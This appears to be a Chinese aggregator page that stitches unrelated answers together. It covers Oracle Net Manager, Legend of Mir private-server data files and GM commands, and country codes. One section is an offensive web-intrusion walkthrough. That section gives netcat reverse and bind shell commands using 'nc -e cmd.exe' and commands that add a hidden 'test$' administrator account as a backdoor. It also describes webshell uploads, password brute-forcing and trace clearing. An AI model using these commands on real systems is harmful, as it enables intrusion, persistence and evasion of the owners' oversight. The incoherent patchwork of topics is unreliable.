nmp資料庫

『壹』 Oracle Net Services 配置: 不動了怎麼辦

NetManager配置連接後，點擊測試時，表象卡死，如下圖：

『貳』 傳世私服服務端 如何添加別服的新地圖 好用的話200分送上

服務端添加地圖是關聯性的 需要在D:\AotianServer\Mir200\Map文件夾下也復制一份地圖 這樣啟動完成進游戲也還是黑的 因為客戶端也需要有相應的地圖補丁文件 data文件夾下 就是地磚文件Objects xx

『叄』 nmp文件用什麼軟體打開啊

第一節 data文件夾的布局

首先有 5個子文件夾，分別為
humandata 存放人物升級的屬性信息
maps 存放地圖信息
MonItems 存放怪物掉寶文件

熱血傳奇-熱血蒼龍戰區-最新裝備價格-會員...
[戰士戰神套裝 | 道士真魂套裝 | 法師聖魔套裝 ]

script 存放npc的腳本文件
stringlist 存放腳本中使用的一些字元串的表，具體作用在講解腳本的時候詳細描述

還有幾個文本文件，分別為

server.txt 內容是游戲世界伺服器的一些配置
baseitem.txt 物品數據文件
basemagic.txt 技能數據文件
basemonster.txt 怪物數據文件
mongen.txt 怪物刷新文件
npcgen.txt npc刷新文件
startpoint.txt 出生點的設置
notice.txt 協議對話框的內容

以上是data中的主要數據的分布，其他文件一般是非必須的文件。

第二節。物品數據

物品數據文件 baseitem.txt 詳細解釋

在物品數據文件baseitem.txt裡面，每種物品數據文件按照下面這種格式來存儲。

name/stdmode/shape/image/specialpower/ac1/ac2/mac1/mac2/dc1/dc2/mc1/mc2/sc1/sc2/wei

ght/maxra/price/needtype/needlevel

示例：
粗布衣(男)/10/ 1/117/0/2/ 2/0/1/0/0/0/0/0/0/ 5/ 5/2000/0/1

其中，各個欄位的含義是

name 表示物品名字，
stdmode 表示物品的種類，
shape 字面上是形狀，其實表示物品的一些特性，根據stdmode不同而不同，
image 表示的是物品的外觀，就是掉在地上的外觀和放在背包裡面的外觀，對於武器，頭盔

和衣服來說，還表示裝備在身上的時候在裝備畫面的樣子，但不表示游戲中的角色的外觀。這

個，我們稍候再議。
specialpower,ac1,ac2,mac1,mac2這些屬性根據stdmode的不同而表示不同的含義。
dc1 表示最小攻擊力
dc2 表示最大攻擊力
mc1 表示最小魔法
mc2 表示最大魔法
sc1 表示最小道術
sc2 表示最大道術
weight 表示物品的重量
maxra 表示物品的持久/書籍表示學習的等級
price 表示價格（這個屬性基本沒用）
needtype 表示限制條件的類型（0- 表示等級限制 1- 表示攻擊力限制 2- 表示魔法限

制 3- 表示道術限制）
needlevel 表示限制條件的數值

stdmode欄位，在整個物品數據裡面起著非常重要的作用，它決定了物品的作用和屬性加成。

首先，讓我們了解一下都有哪些物品類型

0- 葯品
10 男裝
11 女裝
15 頭盔
5 普通武器
6 特殊類武器(鋤頭等)
22 23 戒指類
19 20 21 項鏈類
24 26 手套手鐲類
4 書籍
3 特殊作用類物品，如祝福油
31 葯品包，捆綁類物品
81 靴子
58 腰帶
45 材料 如 紅綠藍 寶石 x星珠 魔蛋 未鑒定的物品等
55 特殊類物品 如 天玉寶石
59 60 61 可裝備寶石類
30 勛章神飾類
34 道符
52 雜物類
44 鑒定卷軸 任務類物品 戰斗號角
47 金磚金條類
46 賞金令牌等任務物品
38 黑暗之戒
25 稻草人偶
33 馬牌
43 礦石
49 字體卷軸

下面詳細解釋下 葯品 武器 男女服裝 戒指 手鐲 腰帶 靴子 寶石 勛章 神飾 stdmode對屬性

加成的影響

<<葯品 >>
stdmode = 0
ac1 表示+HP
mac1 表示+MP
其他屬性不加

<<武器 >>
stdmode = 5,6
ac1 表示幸運
ac2 表示准確
ac3 表示詛咒
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<男女衣服 >>
stdmode = 10,11
ac1 ac2 表示防禦最小最大值
mac1 mac2表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<戒指 >>
stdmode = 22 時

ac1 ac2 表示防禦最小最大值
mac1 mac2 表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

stdmode = 23 時

ac1 表示攻擊速度
ac2 表示毒物躲避，顯示出來的值是設置值的10倍，比如設置10 顯示 100%

mac1 表示攻擊速度減多少
mac2 表示中毒恢復 也是10倍的關系
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<手鐲>>
stdmode = 24
ac2 = 命中
mac2 = 迴避
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

stdmode = 26
ac1 ac2 表示防禦最小最大值
mac1 mac2 表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<腰帶>>
stdmode = 58
ac1 ac2 表示防禦最小最大值
mac1 mac2 表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<靴子>>
stdmode = 81
ac1 ac2 表示防禦最小最大值
mac1 mac2 表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<寶石>>
stdmode = 59, 60, 61
ac1 ac2 表示防禦最小最大值
mac1 mac2 表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值

<<勛章>>
stdmode = 30
shape = 0
ac1 ac2 表示防禦最小最大值
mac1 mac2 表示魔防最小最大值
dc1 dc2 mc1 mc2 sc1 sc2 分別表示 攻擊 魔法 道術 的最小最大值
<<神飾>>
stdmode = 30
shape = 1
sc1 表示極品爆出率

接下來說一下shape對於物品的影響，
在上面一節中，我們看到，神飾和勛章stdmode 都是30，但是shape不同，加成屬性就不同。其

實shape的作用遠大於此，大概說來，shape就是一種子類型的作用，就是從stdmode這種大類型

中分出子類

<<衣服>>
shape在衣服類中，取值范圍是0-15，分別表示光身子和15套衣服，其實用到的只有其中的幾套

，還有幾套做了保留。

<<武器>>
shape在武器類中，標志著拿在手裡的外觀，就是別人看到你的樣子。

<<葯品>>
根據觀察，shape在葯品中的左右就是標記是否是瞬間作用(太陽水) 0 表示慢慢恢復 1表示瞬

間恢復

<<書籍>>
書籍類，shape的作用在於標記書籍適用的職業 0 表示武士 1 表示法師 2 表示道士。

其他類的shape的作用就在於區別特殊於一般的關系，比如特殊戒指，特殊項鏈的shape就和普

通的不一樣。

好了，物品數據的解釋就到這里，如果還有不明白的，可以在論壇發帖子問我。

第三節 地圖數據

地圖數據存放在data文件夾下的maps子文件夾下。
進入maps子文件夾，可以看到兩個文件夾logic和physics。字面意思就是邏輯和物理。

淡抹夕陽模擬器和普通的m2伺服器的一個不同之處就是地圖數據處理上，完全不同。分為邏輯

地圖和物理地圖兩種，
邏輯地圖主要負責管理地圖上的角色，怪物，等，物理地圖主要提供障礙信息。

簡單的來說，這種方式的好處就是，當你伺服器中有兩個中州的時候，他們都指向內存和硬碟

上的同一個 0.nmp。也就是節省內存和硬碟消耗，共享同一份障礙圖。

存放在physics裡面的就是後綴名是nmp的地圖文件，大家可以從客戶端的map文件夾把所有的

nmp文件拷貝到physics文件夾內。

存放在logic裡面的是後綴名是ini的邏輯地圖配置文件。ini的內容，一般是下面這樣的。

[define]
name = 中州
;地圖的名字，顯示在客戶端的界面上
blockmap = 0
;障礙圖的名字，比如障礙圖是xxxx.nmp 這里就寫xxxx
minimap = 101
;小地圖號，這個對應客戶端的mmap裡面的小地圖
mapid = 16
;地圖編號，必須是唯一的編號
linkcount = 19
;連接數量，就是出口的數量
[linkpoint]
;下面描述了19個出口的信息，格式是 (本地圖x,本地圖y)=>[目的地圖編號](目的地圖x,目的

地圖y)
linkpoint1=(740,328)=>[17](34,45)
linkpoint2=(468,226)=>[164](116,85)
linkpoint3=(520,267)=>[29](7,21)
linkpoint4=(725,35)=>[67](438,971)
linkpoint5=(484,141)=>[28](12,52)
linkpoint6=(372,207)=>[30](5,16)
linkpoint7=(473,250)=>[31](9,20)
linkpoint8=(548,195)=>[32](19,28)
linkpoint9=(381,258)=>[34](6,19)
linkpoint10=(418,205)=>[37](6,13)
linkpoint11=(461,259)=>[38](8,13)
linkpoint12=(497,245)=>[39](7,13)
linkpoint13=(493,272)=>[40](7,16)
linkpoint14=(474,126)=>[41](13,18)
linkpoint15=(488,173)=>[42](6,18)
linkpoint16=(28,346)=>[43](258,497)
linkpoint17=(55,176)=>[43](241,35)
linkpoint18=(777,393)=>[47](201,329)
linkpoint19=(783,532)=>[273](12,14)

如果地圖連接出了問題，可以修改這里

在發布的版本中，我們預先根據官方的minmaplist.txt生成了一些數據ini，但是可能有錯誤，

當遇到錯誤的時候，可以自己修改，也可以到論壇求助，我們會給你幫助的。本文章由我愛游戲提供521G.com

第四節。其他數據

1- GM列表 gmlist.txt

裡面保存了gm的帳號和等級，使用這些帳號登陸游戲的gm就可以通過@gamemaster來打開gm模式

，從而使用一些gm特有的命令。
這里注意！！！！，是登陸用的帳號，不是角色名字，好多玩家都因為寫了角色名字導致無法

打開gm模式。

現在支持的gm命令
@setlevel(等級) 設置自己的等級
@addexp(經驗) 增加自己的經驗
@move(地圖id, 坐標x, 坐標y ) 移動到指定地圖的x,y坐標處
@move(坐標x, 坐標y) 移動到當前地圖的 x,y 坐標處
@makeitem(物品名字 創建一個物品，並加入到背包里
@addmagic(技能名字 為自己添加一個存在於basemagic.txt里的技能
@callmon(怪物名字 召喚一個怪物到自己的下面一個格子(如果該格子有人，命令失敗)

常用的gm命令就這些了，其他的都是開發階段作調試用命令，不推薦使用。

2- 技能數據 basemagic.txt

這個由於暫時沒有完全完成，所以，不能給大家詳細的介紹，中間的文件結構可能會按照開發

進度而改變，所以，請大家關注論壇，上面有完整的從官方伺服器mp下來的技能數據。

3- 怪物數據basemonster.txt
怪物數據文件的結構如下

name/title/view/hp/dc/ac/mac/gainexp/delay/autoattack

name 表示怪物類名字
title 表示怪物的顯示名字(客戶端顯示)
使用這兩個名字是為了解決相同名字的怪物掉不同的東西和擁有不同的能力。
view 表示怪物的外觀，內部論壇上已經發布了全部怪物的外觀，沒有看到的朋友可以找一下老

貼子，我們發布的伺服器包里也是完整版的怪物外觀。

hp 表示怪物的hp上限
dc 表示怪物攻擊力 用 a-b的形式， a表示最小攻擊力，b表示最大攻擊力
ac 表示怪物防禦 使用和攻擊力一樣的表示形式
mac 表示怪物的魔法防禦，使用和攻擊力一樣的表示形式
gainexp 表示殺死怪物可以得到的經驗值
delay 表示怪物的ai時間間隔，單位是毫秒。
autoattack 是一個標記表示是否自動攻擊，現在還沒用到，全部設置為1

4- mongen.txt 怪物刷新數據文件
文件格式如下
name/mapid/x/y/range/count/refreshdelay(seconds)

name表示刷新的怪物名字，對應怪物數據文件中的name
mapid 表示刷新的地圖的id
x,y表示刷新的坐標
range表示刷新的范圍，以格子為單位
count表示刷新的數量，單位 只
refreshdelay表示刷新的間隔，單位 秒

5- startpoint.txt 出生點坐標文件
warrior = [16](414,600)-(416,604)
magician = [16](414,600)-(416,604)
taoshi = [16](414,600)-(416,604)

前面的 warrior表示戰士 magician 表示法師 taoshi 表示道士
後面的[]內的數字表示地圖的編號 16 代表中州
後面第一個括弧表示 區域的左上角坐標， 後面一個括弧表示區域的右下角坐標。

6- notice.txt 協議框文字
每次登錄游戲的時候都能看到寫在這個文件中的文字，確認後才能進入游戲。

7- npcgen.txt npc的刷新文件

格式如下

name/id/view/mapid/x/y/istalk/scriptfile

name 表示npc的名字
id 表示npc的資料庫id,目前沒用隨便設置
view 表示npc的外觀，論壇上有人發過全版
mapid 表示npc所在地圖的id
x/y 表示npc的坐標
istalk 表示是否為對話npc，目前固定為1
scriptfile 是腳本文件的名字，對應script文件夾中的 設置值.txt 文件， 比如你設置這里

為 abc 那麼對應script下的abc.txt

關於腳本編寫的問題，我以後詳細講解~

『肆』 傳奇世界nmp地圖文件用什麼軟體打開

用DB2000 的資料庫 可以打開看 而且還可以查看 你游戲里的 所有裝備屬性和樣子！

『伍』 web滲透是什麼

Web滲透測試分為白盒測試和黑盒測試，白盒測試是指目標網站的源碼等信息的情況下對其滲透，相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透，以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟，信息收集，漏洞掃描，漏洞利用，提權，內網滲透，留後門，清理痕跡。一般的滲透思路就是看是否有注入漏洞，然後注入得到後台管理員賬號密碼，登錄後台，上傳小馬，再通過小馬上傳大馬，提權，內網轉發，進行內網滲透，掃描內網c段存活主機及開放埠，看其主機有無可利用漏洞（nessus）埠（nmap）對應服務及可能存在的漏洞，對其利用（msf）拿下內網，留下後門，清理痕跡。或者看是否有上傳文件的地方，上傳一句話木馬，再用菜刀鏈接，拿到資料庫並可執行cmd命令，可繼續上大馬.........思路很多，很多時候成不成功可能就是一個思路的問題，技術可以不高，思路一定得騷。

信息收集

信息收集是整個流程的重中之重，前期信息收集的越多，Web滲透的成功率就越高。

DNS域名信息：通過url獲取其真實ip,子域名(Layer子域名爆破機)，旁站(K8旁站，御劍1.5)，c段，網站負責人及其信息（whois查詢）

整站信息：伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型；

網站常見搭配為：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目錄信息（御劍，dirbust）

開放埠信息（nmp）

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描，看其是否有可利用漏洞。

常見漏洞：

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什麼也好對相應漏洞進行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

後台密碼爆破（burp）

埠爆破（hydra）

提權

獲得shell之後我們許可權可能很低，因此要對自己提權，可以根據伺服器版本對應的exp進行提權，對於Windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行埠轉發可用nc

nc使用方法：

反向連接

在公網主機上進行監聽：

nc-lvp 4444

在內網主機上執行：

nc-e cmd.exe 公網主機ip4444

成功之後即可得到一個內網主機shell

正向連接

遠程主機上執行：

nc-l -p 4444 -t -e cmd.exe

本地主機上執行：

nc-vv 遠程主機ip4444

成功後，本地主機即可遠程主機的一個shell

然後就是對內網進行滲透了，可以用主機漏洞掃描工具（nessus,x-scan等）進行掃描看是否有可用漏洞，可用msf進行利用，或者用nmap掃描存活主機及開放埠，可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門

留後門

對於網站上傳一句話木馬，留下後門

對於windows用戶可用hideadmin創建一個超級隱藏賬戶

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到，但在控制面板可以看到，還需要改注冊表才能實現控製版面也看不到，太過麻煩，不多贅述，所以還是用工具省心省力。

『陸』 一些英文的縮寫

中國的英文縮寫是CHN。

中國（China)的縮寫。 CHN是在聯合國注冊的國家代碼，國際上的正式場合都用這種統一的國家代碼。

在奧運會，聯合國，APEC（亞太經濟合作組織）等國際官方非官方場合下。中國的英文均以使用：CHN或者CHINA。

PRC是the People's Republic of China的英文縮寫，不是聯合國登記的國家代碼，其使用具有隨意性。

(6)nmp資料庫擴展閱讀:

一些其他國家的英文縮寫如下：

1、AF-阿富汗(AFGHANISTAN)

2、AG-安地卡及巴布達(Antigua and Barbuda)

3、AL-阿爾巴尼亞(ALBANIA)

4、AI-安圭拉(Anguilla)

5、AM-亞美尼亞(ARMENIA)

6、AO-安哥拉(ANGOLA)

7、AR-阿根廷(ARGENTINA)

8、AT-奧地利(AUSTRIA)